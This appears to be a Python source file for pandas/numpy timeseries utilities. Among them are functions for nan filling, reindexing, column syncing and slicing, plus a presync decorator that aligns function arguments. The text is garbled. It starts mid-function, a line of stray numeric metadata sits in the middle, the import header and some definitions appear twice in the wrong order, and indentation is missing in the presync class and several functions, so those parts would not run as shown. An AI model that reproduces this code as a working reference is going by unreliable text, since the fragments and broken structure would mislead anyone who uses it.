    if len(counts):
        return _np_index(counts, index)
    return None
@loop(list, tuple, dict)
def _df_fillna(df, method = None, axis = 0, limit = None):
    # Core nan-filling engine behind df_fillna; the @loop decorator applies
    # it element-wise to lists/tuples/dicts.
    methods = as_list(method)
    if len(methods) == 0:
        # nothing to do: return the object unchanged
        return df
    if is_arr(df):
        # numpy arrays are handled by round-tripping through pandas
        return df_fillna(pd.DataFrame(df) if len(df.shape)==2 else pd.Series(df), method, axis, limit).values
    res = df
    # methods are applied in sequence, each transforming the result of
    # the previous one
    for m in methods:
        if is_num(m):
            # a numeric "method" means: fill nans with that constant
            res = res.fillna(value = m, axis = axis, limit = limit)
        elif m in ['backfill', 'bfill', 'pad', 'ffill']:
            res = res.fillna(method = m, axis = axis, limit = limit)
        elif m in ('fnna', 'nona'):
            # 'fnna': truncate everything before the first non-nan row
            # 'nona': drop every row that is entirely nan
            nonan = ~np.isnan(res)
            if len(res.shape)==2:
                # a row counts as non-nan if ANY column is non-nan
                nonan = nonan.max(axis=1)
            if m == 'fnna':
                nonan = nonan[nonan.values]
                if len(nonan):
                    res = res[nonan.index[0]:]
                else:
                    # all-nan input: return an empty slice
                    res = res.iloc[:0]
            elif m == 'nona':
                res = res[nonan.values]
        else:
            # otherwise m names a pandas interpolation method; a negative
            # limit requests backward interpolation
            if is_num(limit) and limit<0:
                res = res.interpolate(method = m, axis = axis, limit = abs(limit),
                                      limit_direction = 'backward')
            else:
                res = res.interpolate(method = m, axis = axis, limit = limit)
    return res
def df_fillna(df, method = None, axis = 0, limit = None):
    """
    Fill or remove nans in a dataframe/numpy array (or collections thereof).

    A generalisation of df.fillna():

    - supports np.ndarray as well as dataframes
    - `method` may be a list of methods applied in sequence; each entry is
      either a constant value, a pandas fill method ('ffill', 'bfill',
      'pad', 'backfill'), a pandas interpolation method ('linear', 'time',
      'quadratic', 'cubic', ...), 'fnna' (remove everything up to the
      first non-nan) or 'nona' (remove all-nan rows)
    - a negative `limit` interpolates backwards

    :Parameters:
    ----------------
    df : dataframe/numpy array (or list/dict of these)
    method : string, number, list of these, or None, optional
    axis : int, optional
        axis to operate on. The default is 0.
    limit : int, optional
        how many nans get filled per gap. The default is None (unlimited).

    :Example:
    ---------
    >>> from pyg import *; import numpy as np
    >>> df = np.array([np.nan, 1., np.nan, 9, np.nan, 25])
    >>> assert eq(df_fillna(df, 'ffill'), np.array([ np.nan, 1., 1., 9., 9., 25.]))
    >>> assert eq(df_fillna(df, ['ffill','bfill']), np.array([ 1., 1., 1., 9., 9., 25.]))
    >>> assert eq(df_fillna(df, 'linear'), np.array([ np.nan, 1., 5., 9., 17., 25.]))
    >>> assert eq(df_fillna(np.array([np.nan]*3 + [1.]), 'fnna'), np.array([1.]))

    Note: df_fillna does not maintain state of the latest 'prev' value;
    use ffill_ for that.

    :Returns:
    -------
    array/dataframe with nans removed/filled
    """
    return _df_fillna(df, method, axis = axis, limit = limit)
@loop(dict, list, tuple)
def _nona(df, value = np.nan):
    """Drop rows equal to `value`; for 2-d objects a row is dropped only
    when every column matches."""
    if np.isnan(value):
        matches = np.isnan(df)
    elif np.isinf(value):
        matches = np.isinf(df)
    else:
        matches = df == value
    if len(matches.shape) == 2:
        # keep a row unless ALL of its columns match the value
        matches = matches.min(axis=1) == 1
    return df[~matches]
def nona(a, value = np.nan):
    """
    removes rows that are entirely nan (or a specific other value)

    :Parameters:
    ----------------
    a : dataframe/ndarray
    value : float, optional
        value to be removed. The default is np.nan.

    :Example:
    ----------
    >>> from pyg import *
    >>> a = np.array([1,np.nan,2,3])
    >>> assert eq(nona(a), np.array([1,2,3]))

    :Example: multiple columns
    ---------------------------
    >>> a = np.array([[1,np.nan,2,np.nan], [np.nan, np.nan, np.nan, 3]]).T
    >>> b = np.array([[1,2,np.nan], [np.nan, np.nan, 3]]).T ## 2nd row has nans across
    >>> assert eq(nona(a), b)
    """
    # BUG FIX: `value` was previously dropped (the call was _nona(a)), so
    # e.g. nona(a, 0) silently behaved like nona(a, np.nan).
    return _nona(a, value)
@loop(list, tuple, dict)
def _df_reindex(ts, index, method = None, limit = None):
    # Core reindexing engine behind df_reindex; the @loop decorator applies
    # it element-wise to lists/tuples/dicts.
    methods = as_list(method)
    if is_pd(ts):
        if is_int(index):
            raise ValueError('trying to reindex dataframe %s using numpy interval length %i'%(ts, index))
        if len(methods) and methods[0] in ['backfill', 'bfill', 'pad', 'ffill']:
            # fill methods: drop all-nan rows first so the reindex fills
            # from genuine observations, then apply any remaining methods
            res = _nona(ts).reindex(index, method = methods[0], limit = limit)
            res = _df_fillna(res, method = methods[1:], limit = limit)
        else:
            res = ts.reindex(index)
            res = _df_fillna(res, method = method, limit = limit)
        return res
    elif is_arr(ts):
        if isinstance(index, pd.Index):
            # a numpy array can only be "reindexed" to a pandas index of
            # identical length (it is assumed to already be aligned)
            if len(index) == len(ts):
                return ts
            else:
                raise ValueError('trying to reindex numpy array %s using pandas index %s'%(ts, index))
        elif is_int(index):
            # integer index: truncate to the last `index` rows, or pad
            # the front with nans up to that length
            if index<len(ts):
                res = ts[-index:]
            elif index>len(ts):
                shape = (index - len(ts),) + ts.shape[1:]
                res = np.concatenate([np.full(shape, np.nan),ts])
            else:
                res = ts
            return df_fillna(res, method = methods, limit = limit)
        else:
            return ts
    else:
        # non-timeseries objects pass through unchanged
        return ts
@loop(list, tuple, dict)
def _df_recolumn(ts, columns):
    """Project a multi-column dataframe onto `columns`, inserting nan
    columns for missing names; everything else passes through unchanged."""
    recolumnable = (columns is not None and is_df(ts) and ts.shape[1] > 1
                    and len(set(ts.columns)) == ts.shape[1])
    if not recolumnable:
        return ts
    data = {col: ts[col].values if col in ts.columns else np.nan for col in columns}
    return pd.DataFrame(data, index = ts.index)
def df_recolumn(ts, columns = None):
    """Align multi-column dataframes (or collections of them) onto the
    given column list; see _df_recolumn for the per-object rules."""
    return _df_recolumn(ts, columns)
def np_reindex(ts, index, columns = None):
    """
    Convert a numpy timeseries back into a pandas object on `index`.

    pyg's numpy workflow: determine a global timestamp, resample all
    timeseries to it, convert to numpy arrays, do the maths, then use
    np_reindex to return to pandas.

    :Parameters:
    ----------------
    ts : numpy array
    index : pandas.Index (or a pandas object whose index is used)
    columns: list/array of column names (or a dataframe whose columns are used)

    :Example:
    -------
    >>> from pyg import *
    >>> ts = np.array(np.random.normal(0,1,1000))
    >>> index = pd.Index(drange(-1999))
    >>> np_reindex(ts, index)

    :Returns:
    ----------
    pd.DataFrame/pd.Series
    """
    if is_pd(index):
        index = index.index
    # align lengths by truncating the longer of the two from the front
    if len(index) > len(ts):
        index = index[-len(ts):]
    elif len(index) < len(ts):
        ts = ts[-len(index):]
    res = pd.DataFrame(ts, index) if len(ts.shape) >= 2 else pd.Series(ts, index)
    if columns is not None:
        if is_df(columns):
            columns = columns.columns
        res.columns = columns
    return res
def df_reindex(ts, index = None, method = None, limit = None):
    """
    A slightly more general version of df.reindex(index).

    :Parameters:
    ----------------
    ts : dataframe or numpy array (or list/dict of these)
        timeseries to be reindexed
    index : None, str, timeseries, pd.Index or array
        None is a no-op; a string selects a join policy
        ('inner'/'outer'/'left'/'right') computed over ts itself; a
        timeseries contributes its own index; an array is wrapped as an
        index.
    method : str, list of str, float, optional
        nan handling, see df_fillna. The default is None.

    :Example:
    -----------------------------
    >>> tss = [pd.Series(np.random.normal(0,1,10), drange(-i, 9-i)) for i in range(5)]
    >>> assert len(df_reindex(tss, 'inner')[0]) == 6
    >>> assert len(df_reindex(tss, 'outer')[0]) == 14
    >>> assert eq(df_reindex(tss, tss[0])[0], tss[0])

    :Returns:
    -------
    timeseries/np.ndarray (or list/dict of these), reindexed.
    """
    if index is None:
        return ts
    if is_str(index):
        index = df_index(ts, index)
    elif is_ts(index):
        index = index.index
    elif is_arr(index):
        index = pd.Index(index)
    return _df_reindex(ts, index, method = method, limit = limit)
def df_concat(objs, columns = None, axis=1, join = 'outer'):
    """
    simple concatenator:

    - defaults to concatenating by date (for timeseries)
    - a dict of timeseries uses its keys as column names
    - non-pandas entries are broadcast as constant series on the joint index
    - when `objs` is already a DataFrame, `columns` renames its columns
      (a list replaces them wholesale; a dict renames selectively)

    :Parameters:
    ----------
    objs : list/dict of timeseries, or a DataFrame to rename
    columns : str/list/dict
        names for the new columns. The default is None.
    axis : int, optional
        axis to merge on. The default is 1.
    join : str, optional
        inner/outer, see pd.concat. The default is 'outer'.

    :Example:
    ---------
    >>> objs = [pd.Series([1,2,3], [4,5,6]), pd.Series([3,4,5], [1,2,4])]
    >>> res = df_concat(objs, ['a', 'b'])

    :Returns:
    -------
    res : pd.DataFrame
    """
    if isinstance(objs, dict):
        columns = list(objs.keys())
        objs = list(objs.values())
    if isinstance(objs, list):
        frames = [o for o in objs if is_pd(o)]
        res = pd.concat(frames, axis = axis, join = join)
        if len(frames) < len(objs):
            # broadcast non-pandas values as constant series on the
            # joint index established by the first concat
            frames = [o if is_pd(o) else pd.Series(o, res.index) for o in objs]
            res = pd.concat(frames, axis = axis, join = join)
    elif isinstance(objs, pd.DataFrame):
        # copy before renaming so the caller's frame is not mutated
        res = objs.copy() if columns is not None else objs
    if columns is not None:
        if isinstance(columns, list):
            res.columns = columns
        else:
            res = res.rename(columns = columns)
    return res
@loop(list, dict, tuple)
def _df_column(ts, column, i = None, n = None):
    """
    This is mostly a helper function to help us loop through multiple columns.
    Function grabs a column from a dataframe/2d array

    :Parameters:
    ----------
    ts : dataframe
        the original dataframe or 2-d numpy array
    column : str
        name of the column to grab.
    i : int, optional
        Can grab the column using its index. The default is None.
    n : int, optional
        asserting the number of columns, ts.shape[1]. The default is None.

    :Returns:
    -------
    a series or a 1-d numpy array (np.nan when the column is missing)
    """
    if is_df(ts):
        if ts.shape[1] == 1:
            # single-column frames collapse to their only column
            return ts[ts.columns[0]]
        elif column in ts.columns:
            return ts[column]
        elif column is None and i is not None:
            # positional access is only legitimate for frames WITHOUT
            # unique column names (which are treated like arrays)
            if len(set(ts.columns)) == ts.shape[1]: #unique columns, don't call me using i
                raise ValueError('trying to grab %ith column from a dataframe with proper columns: %s'%(i, ts.columns))
            elif n is not None and ts.shape[1]!=n:
                raise ValueError('trying to grab %ith column and asserting must have %i columns but have %i'%(i, n, ts.shape[1]))
            else:
                if i<ts.shape[1]:
                    return ts.iloc[:,i]
                else:
                    # positional index beyond the frame's width: missing
                    return np.nan
        else:
            return np.nan
    elif is_arr(ts) and len(ts.shape) == 2:
        if ts.shape[1] == 1:
            return ts.T[0]
        elif i is not None:
            if n is not None and ts.shape[1]!=n:
                raise ValueError('trying to grab %ith column and asserting must have %i columns but have %i'%(i, n, ts.shape[1]))
            elif i<ts.shape[1]:
                return ts.T[i]
            else:
                return np.nan
        else:
            return ts
    else:
        # 1-d objects and non-pandas/non-array values pass through
        return ts
def df_column(ts, column, i = None, n = None):
    """
    Grab a single column from a dataframe/2-d array (or collections of
    them); see _df_column for the per-object rules.

    :Parameters:
    ----------
    ts : dataframe
        the original dataframe or 2-d numpy array
    column : str
        name of the column to grab.
    i : int, optional
        positional fallback when columns are not unique. The default is None.
    n : int, optional
        asserting the number of columns, ts.shape[1]. The default is None.

    :Returns:
    -------
    a series or a 1-d numpy array
    """
    return _df_column(ts, column, i = i, n = n)
def _convert(res, columns):
    """Reassemble per-column results (a dict keyed by column name) into a
    single object: a DataFrame/Series for pandas values, a 2-d/1-d array
    when `columns` is an int, and element-wise tuples for tuple values.

    :Parameters:
    ----------
    res : dict
        results run per each column.
    """
    values = list(res.values())
    if is_tss(values):
        return pd.DataFrame(res)
    if is_arrs(values) and is_int(columns):
        return np.array(values).T
    if is_tuples(values):
        # tuple-valued results are converted element-wise, preserving keys
        rows = zipper(*values)
        return tuple(_convert(dict(zip(res.keys(), row)), columns) for row in rows)
    return np.array(values) if is_int(columns) else pd.Series(res)
def df_sync(dfs, join = 'ij', method = None, columns = 'ij'):
    """
    df_sync performs a sync of multiple dataframes: a joint index is
    computed over all timeseries found (however nested), everything is
    reindexed to it, and multi-column frames are then aligned onto joint
    columns.

    :Parameters:
    ----------
    dfs : list or dict of timeseries (non-timeseries entries pass through)
    join : str, optional
        index join policy. The default is 'ij'.
    method : str/float, optional
        nan handling after reindexing, see df_fillna. The default is None.
    columns : str/False/None, optional
        column join policy for multi-column frames; False/None skips
        column syncing. The default is 'ij'.

    :Example:
    ---------
    >>> a = pd.DataFrame(np.random.normal(0,1,(100,5)), drange(-100,-1), list('abcde'))
    >>> b = pd.DataFrame(np.random.normal(0,1,(100,5)), drange(-99), list('bcdef'))
    >>> res = df_sync([a, b], 'ij')
    >>> assert list(res[0].columns) == list('bcde')
    """
    if isinstance(dfs, dict):
        contents = list(dfs.values())
    elif isinstance(dfs, (list, tuple)):
        contents = list(dfs)
    else:
        return dfs
    flattened = _list(contents)
    timeseries = [obj for obj in flattened if is_ts(obj)]
    joint_index = df_index(flattened, join)
    synced = df_reindex(dfs, joint_index, method = method)
    ### now we do the columns
    if columns is False or columns is None:
        return synced
    joint_columns = df_columns(timeseries, columns)
    return df_recolumn(synced, joint_columns)
class presync(wrapper):
"""
Much of timeseries analysis in Pandas is spent aligning multiple timeseries before feeding them into a function.
presync allows easy presynching of all paramters of a function.
:Parameters:
----------
function : callable, optional
function to be presynched. The default is None.
index : str, optional
index join policy. The default is 'inner'.
method : str/int/list of these, optional
method of nan handling. The default is None.
columns : str, optional
columns join policy. The default is 'inner'.
default : float, optional
value when no data is available. The default is np.nan.
:Returns:
-------
presynch-decorated function
:Example:
-------
>>> from pyg import *
>>> x = pd.Series([1,2,3,4], drange(-3))
>>> y = pd.Series([1,2,3,4], drange(-4,-1))
>>> z = pd.DataFrame([[1,2],[3,4]], drange(-3,-2), ['a','b'])
>>> addition = lambda a, b: a+b
#We get some nonsensical results:
>>> assert list(addition(x,z).columns) == list(x.index) + ['a', 'b']
#But:
>>> assert list(presync(addition)(x,z).columns) == ['a', 'b']
>>> res = presync(addition, index='outer', method = 'ffill')(x,z)
>>> assert eq(res.a.values, np.array([2,5,6,7]))
:Example 2: alignment works for parameters 'buried' within...
-------------------------------------------------------
>>> function = lambda a, b: a['x'] + a['y'] + b
>>> f = presync(function, 'outer', method = 'ffill')
>>> res = f(dict(x = x, y = y), b = z)
>>> assert eq(res, pd.DataFrame(dict(a = [np.nan, 4, 8, 10, 11], b = [np.nan, 5, 9, 11, 12]), index = drange(-4)))
:Example 3: alignment of numpy arrays
-------------------------------------
>>> addition = lambda a, b: a+b
>>> a = presync(addition)
>>> assert eq(a(pd.Series([1,2,3,4], drange(-3)), np.array([[1,2,3,4]]).T), pd.Series([2,4,6,8], drange(-3)))
>>> assert eq(a(pd.Series([1,2,3,4], drange(-3)), np.array([1,2,3,4])), pd.Series([2,4,6,8], drange(-3)))
>>> assert eq(a(pd.Series([1,2,3,4], drange(-3)), np.array([[1,2,3,4],[5,6,7,8]]).T), pd.DataFrame({0:[2,4,6,8], 1:[6,8,10,12]}, drange(-3)))
>>> assert eq(a(np.array([1,2,3,4]), np.array([[1,2,3,4]]).T), np.array([2,4,6,8]))
:Example 4: inner join alignment of columns in dataframes by default
---------------------------------------------------------------------
>>> x = pd.DataFrame({'a':[2,4,6,8], 'b':[6,8,10,12.]}, drange(-3))
>>> y = pd.DataFrame({'wrong':[2,4,6,8], 'columns':[6,8,10,12]}, drange(-3))
>>> assert len(a(x,y)) == 0
>>> y = pd.DataFrame({'a':[2,4,6,8], 'other':[6,8,10,12.]}, drange(-3))
>>> assert eq(a(x,y),x[['a']]*2)
>>> y = pd.DataFrame({'a':[2,4,6,8], 'b':[6,8,10,12.]}, drange(-3))
>>> assert eq(a(x,y),x*2)
>>> y = pd.DataFrame({'column name for a single column dataframe is ignored':[1,1,1,1]}, drange(-3))
>>> assert eq(a(x,y),x+1)
>>> a = presync(addition, columns = 'outer')
>>> y = pd.DataFrame({'other':[2,4,6,8], 'a':[6,8,10,12]}, drange(-3))
>>> assert sorted(a(x,y).columns) == ['a','b','other']
:Example 4: ffilling, bfilling
------------------------------
>>> x = pd.Series([1.,np.nan,3.,4.], drange(-3))
>>> y = pd.Series([1.,np.nan,3.,4.], drange(-4,-1))
>>> assert eq(a(x,y), pd.Series([np.nan, np.nan,7], drange(-3,-1)))
but, we provide easy conversion of internal parameters of presync:
>>> assert eq(a.ffill(x,y), pd.Series([2,4,7], drange(-3,-1)))
>>> assert eq(a.bfill(x,y), pd.Series([4,6,7], drange(-3,-1)))
>>> assert eq(a.oj(x,y), pd.Series([np.nan, np.nan, np.nan, 7, np.nan], drange(-4)))
>>> assert eq(a.oj.ffill(x,y), pd.Series([np.nan, 2, 4, 7, 8], drange(-4)))
:Example 5: indexing to a specific index
----------------------------------------
>>> index = pd.Index([dt(-3), dt(-1)])
>>> a = presync(addition, index = index)
>>> x = pd.Series([1.,np.nan,3.,4.], drange(-3))
>>> y = pd.Series([1.,np.nan,3.,4.], drange(-4,-1))
>>> assert eq(a(x,y), pd.Series([np.nan, 7], index))
:Example 6: returning complicated stuff
----------------------------------------
>>> from pyg import *
>>> a = pd.DataFrame(np.random.normal(0,1,(100,10)), drange(-99))
>>> b = pd.DataFrame(np.random.normal(0,1,(100,10)), drange(-99))
>>> def f(a, b):
>>> return (a*b, ts_sum(a), ts_sum(b))
>>> old = f(a,b)
>>> self = presync(f)
>>> args = (); kwargs = dict(a = a, b = b)
>>> new = self(*args, **kwargs)
>>> assert eq(new, old)
"""
def __init__(self, function = None, index = 'inner', method = None, columns = 'inner', default = np.nan):
# Store the join rule (index), fill method, column-join rule and default on the wrapper's state;
# the base wrapper class keeps them as attributes readable by wrapped().
super(presync, self).__init__(function = function, index = index, method = method, columns = columns , default = default)
@property
def ij(self):
# inner-join variant; copies first so the original wrapper is not mutated
return copy(self) + dict(index = 'inner')
@property
def oj(self):
# outer-join variant
return self + dict(index = 'outer')
@property
def lj(self):
# left-join variant: use the index of the first timeseries argument (see _df_index 'l')
return self + dict(index = 'left')
@property
def rj(self):
# right-join variant: use the index of the last timeseries argument (see _df_index 'r')
return self + dict(index = 'right')
@property
def ffill(self):
# forward-fill values missing after the join
return copy(self) + dict(method = 'ffill')
@property
def bfill(self):
# back-fill values missing after the join
# NOTE(review): ij/ffill call copy(self) first while oj/lj/rj/bfill add to self directly —
# presumably wrapper.__add__ already returns a new object; confirm in the wrapper base class.
return self + dict(method = 'bfill')
def wrapped(self, *args, **kwargs):
# Per-call overrides: 'join', 'method' and 'columns' kwargs trump the wrapper's stored defaults.
_idx = kwargs.pop('join', self.index)
_method = kwargs.pop('method', self.method)
_columns = kwargs.pop('columns', self.columns)
values = list(args) + list(kwargs.values())
listed = _list(values)
tss = [ts for ts in listed if is_ts(ts)]
callargs = inspect.getcallargs(self.function, *args, **kwargs)
# If 'join' names one of the wrapped function's own parameters, use that argument's index verbatim.
if is_str(_idx) and _idx in callargs:
index = _index(callargs[_idx])
else:
index = df_index(listed, _idx)
# Reindex every argument (args and kwargs alike) onto the joint index.
args_= df_reindex(args, index, method = _method)
kwargs_= df_reindex(kwargs, index, method = _method)
### now we do the columns
if _columns is False:
return self.function(*args_, **kwargs_)
else:
cols = [tuple(ts.columns) for ts in tss if is_df(ts) and ts.shape[1]>1]
if len(set(cols))==1: # special case where all 2-d dataframes have same column headers
columns = cols[0]
n = len(columns)
res = {column: self.function(*df_column(args_,column = column, i = i, n = n), **df_column(kwargs_, column=column, i = i, n = n)) for i, column in enumerate(columns)}
else:
columns = df_columns(listed, _columns)
# integer 'columns' means headerless numpy-style width: apply the function column-by-column by position
if is_int(columns):
res = {i: self.function(*df_column(args_, column = None, i = i), **df_column(kwargs_, column=None, i = i)) for i in range(columns)}
elif columns is None:
return self.function(*df_column(args_, column = None), **df_column(kwargs_, column = None))
else:
columns = list(columns) if isinstance(columns, pd.Index) else as_list(columns)
columns = sorted(columns)
res = {column: self.function(*df_column(args_,column = column), **df_column(kwargs_, column=column)) for column in columns}
# res is a per-column dict; _convert stitches it back into a DataFrame/array/Series/tuple
converted = _convert(res, columns)
return converted
@presync
def _div_(a, b):
    """Ratio a / b; timeseries arguments are inner-joined by presync first."""
    return a / b


@presync
def _sub_(a, b):
    """Difference a - b; timeseries arguments are inner-joined by presync first."""
    return a - b


@presync
def _add_(a, b):
    """Sum a + b; timeseries arguments are inner-joined by presync first."""
    return a + b


@presync
def _mul_(a, b):
    """Product a * b; timeseries arguments are inner-joined by presync first."""
    return a * b


@presync
def _pow_(a, b):
    """Power a ** b; timeseries arguments are inner-joined by presync first."""
    return a ** b
def add_(a, b = None, join = 'ij', method = None, columns = 'ij'):
    """Reduced addition of any number of values/timeseries, pairwise presynched.

    >>> a = pd.Series([1,2,3], drange(-2))
    >>> b = pd.Series([1,2,3], drange(-3,-1))
    >>> add_(a, b, 'oj', method = 0)
    """
    terms = as_list(a) + as_list(b)
    step = lambda x, y: _add_(x, y, join = join, method = method, columns = columns)
    return reducer(step, terms)


def mul_(a, b = None, join = 'ij', method = None, columns = 'ij'):
    """Reduced multiplication of any number of values/timeseries, pairwise presynched.

    >>> mul_(a, b, join = 'oj', method = 'ffill')
    >>> cell(mul_, a = a, b = b, join = 'oj')()
    """
    terms = as_list(a) + as_list(b)
    step = lambda x, y: _mul_(x, y, join = join, method = method, columns = columns)
    return reducer(step, terms)


def div_(a, b, join = 'ij', method = None, columns = 'ij'):
    """Division of a by b with presynching; list arguments are first collapsed via mul_."""
    if isinstance(a, list):
        a = mul_(a, join = join, method = method, columns = columns)
    if isinstance(b, list):
        b = mul_(b, join = join, method = method, columns = columns)
    return _div_(a, b, join = join, method = method, columns = columns)


def sub_(a, b, join = 'ij', method = None, columns = 'ij'):
    """Subtraction of b from a with presynching; list arguments are first collapsed via add_."""
    if isinstance(a, list):
        a = add_(a, join = join, method = method, columns = columns)
    if isinstance(b, list):
        b = add_(b, join = join, method = method, columns = columns)
    return _sub_(a, b, join = join, method = method, columns = columns)


def pow_(a, b, join = 'ij', method = None, columns = 'ij'):
    """Equivalent to a ** b, with presynching (inner join by default)."""
    return _pow_(a, b, join = join, method = method, columns = columns)


def min_(a, b = None, join = 'ij', method = None, columns = 'ij'):
    """Reduced np.minimum across all inputs, synched onto a joint index first."""
    terms = df_sync(as_list(a) + as_list(b), join = join, method = method, columns = columns)
    return reducer(np.minimum, terms)


def max_(a, b = None, join = 'ij', method = None, columns = 'ij'):
    """Reduced np.maximum across all inputs, synched onto a joint index first."""
    terms = df_sync(as_list(a) + as_list(b), join = join, method = method, columns = columns)
    return reducer(np.maximum, terms)
def _closed(oc):
if oc in '()oO':
return False
elif oc in '[]cC':
return True
else:
raise ValueError('not sure how to parse boundary %s'%oc)
def _df_slice(df, lb = None, ub = None, openclose = '[)'):
"""
Performs a one-time slice of the dataframe. Does not stitch slices together
pandas slices has two issues:
1) it fails for timeseries quite a bit
2) for timeseries df[dt1:dt2] is close-close while for normal dataframe df[lb,ub] is close-open
"""
if isinstance(df, (pd.Index, pd.Series, pd.DataFrame)) and len(df)>0 and (ub is not None or lb is not None):
l,u = openclose if openclose else '[)'
l = _closed(l); u = _closed(u)
if is_ts(df):
# normalize bounds to datetimes, except time-of-day bounds which are handled below
lb = lb if lb is None or isinstance(lb, datetime.time) else dt(lb)
ub = ub if ub is None or isinstance(ub, datetime.time) else dt(ub)
# fast path: pandas label slicing, attempted only when the closedness matches
if (l or lb is None) and (u or ub is None):
try:
return df[lb:ub]
except Exception:
pass
elif (l or lb is None) and (ub is None or not u):
try:
return df[lb:ub]
except Exception:
pass
# slow path: boolean-mask against the index; datetime.time bounds compare against index.time
if lb is not None:
index = df if isinstance(df, pd.Index) else df.index
if isinstance(lb, datetime.time):
index = index.time
df = df[index>=lb] if l else df[index>lb]
if ub is not None:
index = df if isinstance(df, pd.Index) else df.index
if isinstance(ub, datetime.time):
index = index.time
df = df[index<=ub] if u else df[index<ub]
return df
def df_slice(df, lb = None, ub = None, openclose = '(]', n = 1):
    """Slice a dataframe/series/index (or a list of them) by lower/upper bounds.

    :Parameters:
    ----------
    df : dataframe, or list of dataframes
    lb : single or multiple lower bounds
    ub : single or multiple upper bounds
    openclose : 2-character string controlling each boundary:
        '[' / ']' / 'c' : closed;  '(' / ')' / 'o' : open;  ' ' : do not cut
    n : when df is a list, keep a rolling window of n consecutive members as columns

    :Returns:
    -------
    filtered (and possibly stitched) timeseries

    :Example: multiple timeseries stitched at consecutive upper bounds
    ---------
    >>> ub = drange(1980, 2000, '3m')
    >>> df = [pd.Series(np.random.normal(0,1,1000), drange(-999, date)) for date in ub]
    >>> df_slice(df, ub = ub)

    Time-of-day bounds (datetime.time) are also supported; a wrap-around window
    with lb > ub is built from the two half-day slices.
    """
    if isinstance(lb, tuple) and len(lb) == 2 and ub is None:
        lb, ub = lb
    # wrap-around intraday window, e.g. 22:00 -> 05:00
    if isinstance(ub, datetime.time) and isinstance(lb, datetime.time) and lb > ub:
        head = df_slice(df, None, ub)
        tail = df_slice(df, lb, None)
        return pd.concat([head, tail]).sort_index()
    if isinstance(df, list):
        if isinstance(lb, list) and ub is None:
            ub = lb[1:] + [None]
        elif isinstance(ub, list) and lb is None:
            lb = [None] + ub[:-1]
        boundaries = sorted(set([date for date in lb + ub if date is not None]))
        df = [d if is_pd(d) else pd.Series(d, boundaries) for d in df]
        if n > 1:
            # rolling window: member i carries members i..i+n-1 as columns 0..n-1
            df = [pd.concat(df[i: i + n], axis = 1) for i in range(len(df))]
            for d in df:
                d.columns = range(d.shape[1])
    dfs = as_list(df)
    sliced = [_df_slice(d, lb = l, ub = u, openclose = openclose)
              for d, l, u in zipper(dfs, lb, ub)]
    if len(sliced) == 0:
        return None
    if len(sliced) == 1:
        return sliced[0]
    if isinstance(lb, list) and isinstance(ub, list):
        return pd.concat(sliced)
    return sliced
def df_unslice(df, ub):
    """Invert df_slice: recover, for each upper bound, its original single-column timeseries.

    Given a rolled multi-column timeseries built by df_slice(dfs, ub = ub, n = k),
    and the same stitching points ub, returns a dict {upper_bound: stitched series},
    such that df_slice(list(res.values()), ub = ub, n = k) reproduces df.

    :Example:
    ---------
    >>> ub = drange(1980, 2000, '3m')
    >>> dfs = [pd.Series(date.year * 100 + date.month, drange(-999, date)) for date in ub]
    >>> df = df_slice(dfs, ub = ub, n = 10)
    >>> res = df_unslice(df, ub)
    >>> assert eq(df_slice(list(res.values()), ub = ub, n = 10), df)
    """
    n = df.shape[1] if is_df(df) else 1
    rows = dictable(ub = ub, lb = [None] + ub[:-1], i = range(len(ub)))
    # cut df back into its (lb, ub] segments
    rows = rows(ts = lambda lb, ub: df_slice(df, lb, ub, '(]'))
    # within segment i, column j belongs to upper bound ub[i + j]
    rows = rows(rs = lambda i, ts: dictable(u = ub[i: i+n], j = range(len(ub[i: i+n])))(ts = lambda j: ts[j]))
    per_ub = dictable.concat(rows.rs).listby('u').do([pd.concat, nona], 'ts')
    return dict(per_ub['u', 'ts'])
| 36.134328
| 247
| 0.551449
|
from pyg_base._types import is_df, is_str, is_num, is_tss, is_int, is_arr, is_ts, is_arrs, is_tuples, is_pd
from pyg_base._dictable import dictable
from pyg_base._as_list import as_list
from pyg_base._zip import zipper
from pyg_base._reducer import reducing, reducer
from pyg_base._decorators import wrapper
from pyg_base._loop import loop
from pyg_base._dates import dt
import pandas as pd
import numpy as np
from copy import copy
import inspect
import datetime
from operator import add, mul
__all__ = ['df_fillna', 'df_index', 'df_reindex', 'df_columns', 'presync', 'np_reindex', 'nona', 'df_slice', 'df_unslice', 'min_', 'max_', 'add_', 'mul_', 'sub_', 'div_', 'pow_']
def _list(values):
if isinstance(values, list):
return sum([_list(df) for df in values], [])
elif isinstance(values, dict):
return _list(list(values.values()))
else:
return [values]
@loop(list, tuple, dict)
def _index(ts):
    """Extract an index: a pd.Index passes through, pandas objects yield .index, numpy arrays their length."""
    if isinstance(ts, pd.Index):
        return ts
    if is_pd(ts):
        return ts.index
    if is_arr(ts):
        return len(ts)
    raise ValueError('did not provide an index')
def _df_index(indexes, index):
    """Join a list of pandas indexes per the rule in `index`.

    'inner'/'outer' intersect/union the indexes; 'left'/'right' pick the
    first/last one; a non-string `index` is treated as an explicit index.
    Returns None for an empty list or an unrecognised string rule.
    """
    if len(indexes) == 0:
        return None
    if is_str(index):
        rule = index[0].lower()
        if rule == 'i':
            return reducing('intersection')(indexes)
        if rule == 'o':
            return reducing('union')(indexes)
        if rule == 'l':
            return indexes[0]
        if rule == 'r':
            return indexes[-1]
    else:
        return _index(index)
def _np_index(indexes, index):
if len(indexes) > 0:
if index[0].lower() == 'i':
return min(indexes)
elif index[0].lower() == 'o':
return max(indexes)
elif index[0].lower() == 'l':
return indexes[0]
elif index[0].lower() == 'r':
return indexes[-1]
else:
return None
def df_index(seq, index = 'inner'):
    """Joint index of all pandas objects in seq; falls back to joint length of numpy arrays."""
    flat = _list(seq)
    pd_indexes = [obj.index for obj in flat if is_pd(obj)]
    if len(pd_indexes):
        return _df_index(pd_indexes, index)
    lengths = [len(obj) for obj in flat if is_arr(obj)]
    if len(lengths):
        return _np_index(lengths, index)
    return None
def df_columns(seq, index = 'inner'):
    """Joint columns of multi-column dataframes in seq; falls back to joint width of 2-d arrays."""
    flat = _list(seq)
    col_indexes = [obj.columns for obj in flat
                   if is_df(obj) and obj.shape[1] > 1 and len(set(obj.columns)) == obj.shape[1]]
    if len(col_indexes):
        return _df_index(col_indexes, index)
    widths = [obj.shape[1] for obj in flat
              if (is_arr(obj) or is_df(obj)) and len(obj.shape) > 1 and obj.shape[1] > 1]
    if len(widths):
        return _np_index(widths, index)
    return None
@loop(list, tuple, dict)
def _df_fillna(df, method = None, axis = 0, limit = None):
"""Apply a sequence of fill methods to df, in order.

Each method may be: a number (fill value), 'backfill'/'bfill'/'pad'/'ffill',
